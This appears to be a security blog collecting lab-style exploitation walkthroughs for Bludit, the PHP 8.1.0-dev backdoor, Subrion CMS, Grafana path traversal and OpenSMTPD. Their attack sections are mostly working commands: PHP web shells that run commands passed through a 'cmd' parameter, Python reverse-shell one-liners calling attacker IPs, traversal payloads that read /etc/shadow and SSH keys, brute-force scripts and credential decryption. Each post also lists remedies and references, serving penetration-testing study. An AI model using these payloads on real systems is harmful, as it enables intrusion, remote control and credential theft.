Bludit 3.9.2 code execution – Path Traversal (Authenticated) (CVE-2019-16113)

by Vry4n_ | Apr 2, 2023 | CMS

Bludit could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper validation of file types. By uploading a specially-crafted image file, an attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the application.

PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

Affected Products

Bludit Bludit 3.9.2

Detect

1. Being already authenticated as a log priviledge user, we can check the version of the platform by looking at the site source code page, in our case 3.9.2

2. You can also use curl to get the page source code, then filter by version

curl http://10.10.10.191/admin

Exploit

1. Knowing this version is vulnerable to CVE-2019-16113, we can try to upload an image, in the main page click on content, or, visit http://10.10.10.191/admin/new-content

2. Click on “Images”, choose the image and upload it

3. Click on “Insert”, and then save the post

3. Now try to locate the place where the image is located, you can search for the publication, right click the image and click on “Open Image”, it will take you to the location of the file, in this case:

http://10.10.10.191/bl-content/uploads/pages/1b9f41ad138ee8e237ba29b827e1048a/test-image.jpg

4. Now that we know how to locate the file, we can try to upload php code, do the same steps (1-3), but this time upload a file that has code

vi exploit.php
<?php echo “Follow us.” ?>

Note: we get a warning that only (gif, png, jpg, jpeg, svg) are permitted extensions. So, first we try to change the name of our file, second, we try to upload the file again.

mv exploit.php exploit.png

5. Now you can try to right click on that empty square, then click on image, to find the location of the file

6. If we try to view this image it will give us an error

http://10.10.10.191/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png

7. Now using BurpSuite we will try to upload again, and play with the HTTP request

8. We already know the path where the files are saved (/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png), so we can exploit the variable named “UUID”, to set the path were the file will be saved, we will send this request to BrupSuite Repeater

../../tmp
(ALTERNATIVE) ../../uploads

Note: this will, create the file and folder if necessary, in the response we need to have “Images Uploaded” with 200 OK Server response code

9. Now locate the file within the specified directory

http://10.10.10.191/bl-content/tmp/

10. Open the file, and the PHP code should be executed

http://10.10.10.191/bl-content/tmp/exploit.png

11. Now using the same request in BurpSuite repeater we can modify the code to execute, in this case I will set a system variable to execute code, I will change the filename also to exploi2.png

<?php echo shell_exec($_GET[‘cmd’]); ?>

12. Check the location again and find the new file

http://10.10.10.191/bl-content/tmp/

13. Open the file, in the URL use the cmd variable to execute code, we will first try whoami command

http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=whoami

14. Knowing we can now execute commands we can try to run a reverse shell, first start a listener in the local attacker machine

nc -lvp 4444

15. Now use python to execute the reverse shell connection

http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.6”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

16. Looking at the listener we should have a connection back

Extra

1. Having access to the server we can find users and passwords that can be used to further exploit, move your console to the root directory of the web application, in my case (/var/www/bludit-3.9.2)

cd /var/www/bludit-3.9.2
find . -name users.php 2> /dev/null

2. We can read those files and look for user evidence

cat ./bl-content/databases/users.php

Remedy

See vendor documentation, and upgrade to a recent version.

Resources

https://www.exploit-db.com/exploits/47699

https://packetstormsecurity.com/files/155295

https://github.com/ynots0ups/CVE-2019-16113

https://github.com/advisories/GHSA-ch69-hjrw-4hf3

https://packetstormsecurity.com/files/155295/Bludit-Directory-Traversal-Image-File-Upload.html

Bludit 3.9.2 – Auth Bruteforce Bypass (CVE-2019-17240)

by Vry4n_ | Mar 30, 2023 | CMS

Bludit could allow a remote attacker to bypass security restrictions, caused by a flaw in the bl-kernel/security.class.php. By using many different forged X-Forwarded-For or Client-IP HTTP headers, an attacker could exploit this vulnerability to bypass a brute-force protection mechanism.

Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of the anti-brute force mechanism that is in place to block users that have attempted to incorrectly login 10 times or more. Within the bl-kernel/security.class.php file, there is a function named getUserIp which attempts to determine the true IP address of the end user by trusting the X-Forwarded-For and Client-IP HTTP headers:

The reasoning behind the checking of these headers is to determine the IP address of end users who are accessing the website behind a proxy, however, trusting these headers allows an attacker to easily spoof the source address. Additionally, no validation is carried out to ensure they are valid IP addresses, meaning that an attacker can use any arbitrary value and not risk being locked out.

As can be seen in the content of the log file below (found in bl-content/databases/security.php), submitting a login request with an X-Forwarded-For header value of FakeIp was processed successfully, and the failed login attempt was logged against the spoofed string:

By automating the generation of unique header values, prolonged brute force attacks can be carried out without risk of being blocked after 10 failed attempts, as can be seen in the demonstration video below in which a total of 51 attempts are made prior to recovering the correct password.

Affected versions

Bludit 3.9.2

Detect

1. Access the Bludit main page

http://10.10.10.191/admin

2. Check the source code of the log in page, in the HTML header you can find the application version

Exploit (Script 1)

1. This script runs a list of passwords against a single user (you have to know the user.

git clone https://github.com/pingport80/CVE-2019-17240.git
cd CVE-2019-17240

2. Run the script enter the username and locate the password file, you can also set the number of threads to use. Once the script finds a match it will stop automatically

python3 brute.py -u http://10.10.10.191/admin/ -user fergus -w ../wordlist.txt -t 20

Remedy

Update to a version later than 3.9.2 or apply the patch found at https://github.com/bludit/bludit/pull/1090

Resources

https://github.com/bludit/bludit/pull/1090

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17240

https://www.exploit-db.com/exploits/48746

https://packetstormsecurity.com/files/158875

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

https://github.com/pingport80/CVE-2019-17240

PHP 8.1.0-dev Backdoor Remote Code Execution (RCE)

by Vry4n_ | Feb 13, 2023 | Web Exploitation

PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.

Identification

1. One of the ways to identify if a website is using PHP 8.1.0-dev, is to make a query using Curl, and print out the headers by identifying the server response

curl –head http://10.10.10.242

2. This can also be gotten from BurpSuite, in the server response

Exploitation

Script 1 (PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution)

1. This script automatically exploits user-agentt, and provides a shell (https://www.exploit-db.com/exploits/49933)

curl https://www.exploit-db.com/download/49933 -o exploit.py
ls -l exploit.py

2. Run it against the vulnerable web site

python3 exploit.py
http://10.10.10.242/
whoami

Script 2 (Reverse Shell)

1. Download the script from (https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py)

2. I named the file as exploit2.py

python3 exploit2.py -h

3. Start a listener, in the attacker machine

nc -lvp 3333

4. Run the command with the following data

python3 exploit2.py http://10.10.10.242/ 10.10.14.6 3333

5. Check the listener, and there should be a connection back

Remedy

Upgrade to a newer version, visit the vendor information for more info

Resources

https://www.exploit-db.com/exploits/49933

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

Subrion CMS 4.2.1 – Arbitrary File Upload (Authenticated) – 2018-19422

by Vry4n_ | Jul 9, 2022 | CMS

Subrion CMS could allow a remote authenticated attacker to upload arbitrary files, caused by the improper validation of file extensions by the /panel/uploads URI. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system.

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

Affect version

4.2.1

Identification

1. To identify the version of the Subrion application you can navigate to /panel/

http://ip/panel/
http://exfiltrated.offsec/login/

2. You can use curl to get the page info

curl http://exfiltrated.offsec/panel/ | grep -i Subrion

Exploitation (Script)

1. Now that we know the Subrion CMS version we can proceed search for exploits that apply

searchsploit Subrion 4.2.1

2. Looking at the results, I would use the “Arbitrary File Upload”, (https://www.exploit-db.com/exploits/49876), so, I download it

searchsploit -m php/webapps/49876.py
python 49876.py

3. After successful download, we proceed to test the script, we need to provide the credentials as this is an authenticated attack. You can brute force the credentials or try to use the default ones, admin/admin, in my case the default credentials were set

python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
whoami

Exploitation (Manual)

1. Having already the credentials proceed to log into the Subrion CMS console

http://exfiltrated.offsec/panel/
admin/admin

2. Once, authenticated, go to http://[address]:[port]/[app_path]/panel/uploads

http://exfiltrated.offsec/panel/uploads/

3. We will create a php file that prints text as a Proof of Concept, the file extension should be either pht or .phar

vi php_poc.phar
cat php_poc.phar
<?php echo “Vry4n was here!”; ?>

4. Proceed to upload it to Subrion CMS, and check the location, in this case (uploads/php_poc.phar)

5. Navigate to that location, as you can see code has been executed

http://exfiltrated.offsec/uploads/php_poc.phar

6. Now we can try to upload a basic line of code to proof we can run commands

vi php_code.phar
cat php_code.phar
<?php system($_GET[‘cmd’]); ?>

7. Repeat the upload step, and visit the file, then use the variable cmd followed by the command you need

http://exfiltrated.offsec/uploads/php_code.phar?cmd=whoami

8. We can run a python reverse shell, start a local listener in our attacking machine

nc -lvp 1234

9. I used https://www.revshells.com/ to create a python3 reverse shell

http://exfiltrated.offsec/uploads/php_code.phar?cmd=python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.79”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“sh”)’
whoami

Extra

1. We can try to use a webshell, we will edit the one in our local Kali machine /usr/share/webshells/php/php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/php-reverse-shell.php
cd ~/Desktop
mv php-reverse-shell.php php-reverse-shell.phar
vi php-reverse-shell.phar

2. Start a listener

nc -lvp 1234

3. Upload it to the Subrion CMS, and then execute the .phar file, we should have a connection back

http://exfiltrated.offsec/uploads/php-reverse-shell.phar
whoami

Remedy

No remedy available as of November 14, 2018.

Resources

https://github.com/intelliants/subrion/issues/801

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19422

https://packetstormsecurity.com/files/162591

https://www.exploit-db.com/exploits/49876

https://www.cvedetails.com/cve/CVE-2018-19422/

Grafana 8.3.0 – Directory Traversal and Arbitrary File Read – CVE-2021-43798

by Vry4n_ | Jul 9, 2022 | Linux Exploitation

Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.

Every Grafana instance comes with pre-installed plugins like the Prometheus plugin or MySQL plugin so the following URLs are vulnerable for every instance:

<grafana_host_url>/public/plugins/alertlist/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
<grafana_host_url>/public/plugins/gauge/
<grafana_host_url>/public/plugins/geomap/
<grafana_host_url>/public/plugins/gettingstarted/
<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
<grafana_host_url>/public/plugins/graph/
<grafana_host_url>/public/plugins/heatmap/
<grafana_host_url>/public/plugins/histogram/
<grafana_host_url>/public/plugins/influxdb/
<grafana_host_url>/public/plugins/jaeger/
<grafana_host_url>/public/plugins/logs/
<grafana_host_url>/public/plugins/loki/
<grafana_host_url>/public/plugins/mssql/
<grafana_host_url>/public/plugins/mysql/
<grafana_host_url>/public/plugins/news/
<grafana_host_url>/public/plugins/nodeGraph/
<grafana_host_url>/public/plugins/opentsdb
<grafana_host_url>/public/plugins/piechart/
<grafana_host_url>/public/plugins/pluginlist/
<grafana_host_url>/public/plugins/postgres/
<grafana_host_url>/public/plugins/prometheus/
<grafana_host_url>/public/plugins/stackdriver/
<grafana_host_url>/public/plugins/stat/
<grafana_host_url>/public/plugins/state-timeline/
<grafana_host_url>/public/plugins/status-history/
<grafana_host_url>/public/plugins/table/
<grafana_host_url>/public/plugins/table-old/
<grafana_host_url>/public/plugins/tempo/
<grafana_host_url>/public/plugins/testdata/
<grafana_host_url>/public/plugins/text/
<grafana_host_url>/public/plugins/timeseries/
<grafana_host_url>/public/plugins/welcome/
<grafana_host_url>/public/plugins/zipkin/

Affected Products

All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.
Grafana Grafana 8.0.0
Grafana Grafana 8.3.0

Enumeration

1. We can reach the log in screen and find out about the Grafana version, in our case this is using port 3000 (Version v8.3.0 (914fcedb72))

http://192.168.227.181:3000/login

2. Using curl we can also query the /login page

curl http://192.168.227.181:3000/login | grep “Grafana v”

Exploit (Script)

1. Having identified the version of the application, we can confirm if this application is vulnerable, we will use an automated exploit (https://www.exploit-db.com/exploits/50581) , I will download it using searchsploit

searchsploit grafana
searchsploit -m multiple/webapps/50581.py

2. Now, we can try to use the script to read files

python 50581.py -H http://192.168.227.181:3000
/etc/passwd

3. We can try all the known readable config files to find interesting information. At this point we will try to find Grafana config files, based on their documentation (https://github.com/grafana/grafana/blob/main/conf/defaults.ini) , /etc/grafana/grafana.ini seems to be interesting, since it can hold user/password info under Security section

python 50581.py -H http://192.168.227.181:3000
/etc/grafana/grafana.ini

Exploit (Manual)

1. We can use curl to read files

curl –path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

2. We can try to read a database file and store it in our PC, this is grafana database

curl –path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
ls -l grafana.db

3. Now we can use sqlite3 to read this database file, there is a data_source table that holds user information

sqlite3 grafana.db
.tables
select * from data_source;

Note: Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default.

4. Having the Password & Username, we can proceed to decrypt it

basicAuthPassword”:”anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
sysadmin

Decrypt the password using a script

1. We can now decrypt the password using a script found on the internet (https://github.com/jas502n/Grafana-CVE-2021-43798)

git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git
cd Grafana-CVE-2021-43798
ls

2. Try to run the script, if you run into errors, it might indicate you need to install dependencies

go run AESDecrypt.go
go env -w GO111MODULE=off
go run AESDecrypt.go

3. As we got the error (cannot find package “golang.org/x/crypto/pbkdf2” in any of), we will try to install pbkdf2

go get golang.org/x/crypto/pbkdf2

4. Now try to run the application

go run AESDecrypt.go

5. Since the script includes variables with default values we need to change those to match our credentials:

secret_key (found in /etc/grafana/grafana.ini) = SW2YcwTIb9zpOOhoPsMm
dataSourcePassword (found in /var/lib/grafana/grafana.db) = anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

6. Edit the script

vi AESDecrypt.go

7. Run the script again, the results should be the decrypted password

go run AESDecrypt.go

8. (EXTRA) The result is SuperSecureP@ssw0rd, we can try using this password and the user (found in /var/lib/grafana/grafana.db) to SSH this host

ssh sysadmin@192.168.171.181

(EXTRA) Interesting folder/file for LFI

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

these are directories, FUZZING them can help discover plugins)

/usr/share/grafana/public/app/plugins/datasource
/usr/share/grafana/public/app/plugins/

(EXTRA) Different ways to exploit LFI

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

Remedy

Upgrade to the latest version of Grafana (8.0.7, 8.1.8, 8.2.7, 8.3.1 or later). If you cannot upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability.

Resources

https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

https://packetstormsecurity.com/files/165221

https://exchange.xforce.ibmcloud.com/vulnerabilities/214666

https://www.exploit-db.com/exploits/50581

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/

OpenSMTPD < 6.6.1 - Remote Code Execution (smtp_mailaddr) - CVE-2020-7247

by Vry4n_ | May 24, 2022 | Linux Exploitation

OpenSMTPD could allow a remote attacker to gain elevated privileges on the system, caused by improper handling of user input. By sending a specially-crafted mail request, an attacker could exploit this vulnerability to execute arbitrary code on the system as root.

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the “uncommented” default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Affected Products

OpenSMTPD OpenSMTPD 6.4.0
OpenSMTPD OpenSMTPD 6.4.1
OpenSMTPD OpenSMTPD 6.4.2
OpenSMTPD OpenSMTPD 6.6.0
OpenSMTPD OpenSMTPD 6.6.1

Identify

1. Running a vulnerability scanner against the remote vulnerable server, in this case we are using Nessus

2. We can also Identify this vulnerability using Nmap, in this case the smtp version is 2.0.0

nmap -p 25 –script smtp-commands 192.168.161.71

Exploitation Script

1. Knowing the service version, we can try to exploit this service, using an automated exploit (https://www.exploit-db.com/exploits/47984)

searchsploit smtpd
searchsploit -m linux/remote/47984.py

2. This exploit will allow us to execute remote code, first make sure it is executable, otherwise, assign execute permissions

ls -l 47984.py
(OPTIONAL) chmod 777 47984.py

3. Since, we are allowed to run commands we will first Ping test back to our machine. So first start a TCPdump listener waiting for ICMP traffic

sudo tcpdump -i tun0 icmp and src 192.168.161.71

4. Now, execute the exploit, and point the ping command to our local machine

python 47984.py 192.168.161.71 25 ‘ping -c 4 192.168.49.161’

5. Check the capture, and, confirm it captured ICMP traffic

6. We should proceed with trying to access the server, I’ll try a reverse shell to port 80, because, after testing this server didn’t allow any other port

nc -lvp 80

7. Run the exploit with the reverse shell query, I’ll use python

python 47984.py 192.168.161.71 25 ‘python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”192.168.49.161\”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\”/bin/bash\”)”‘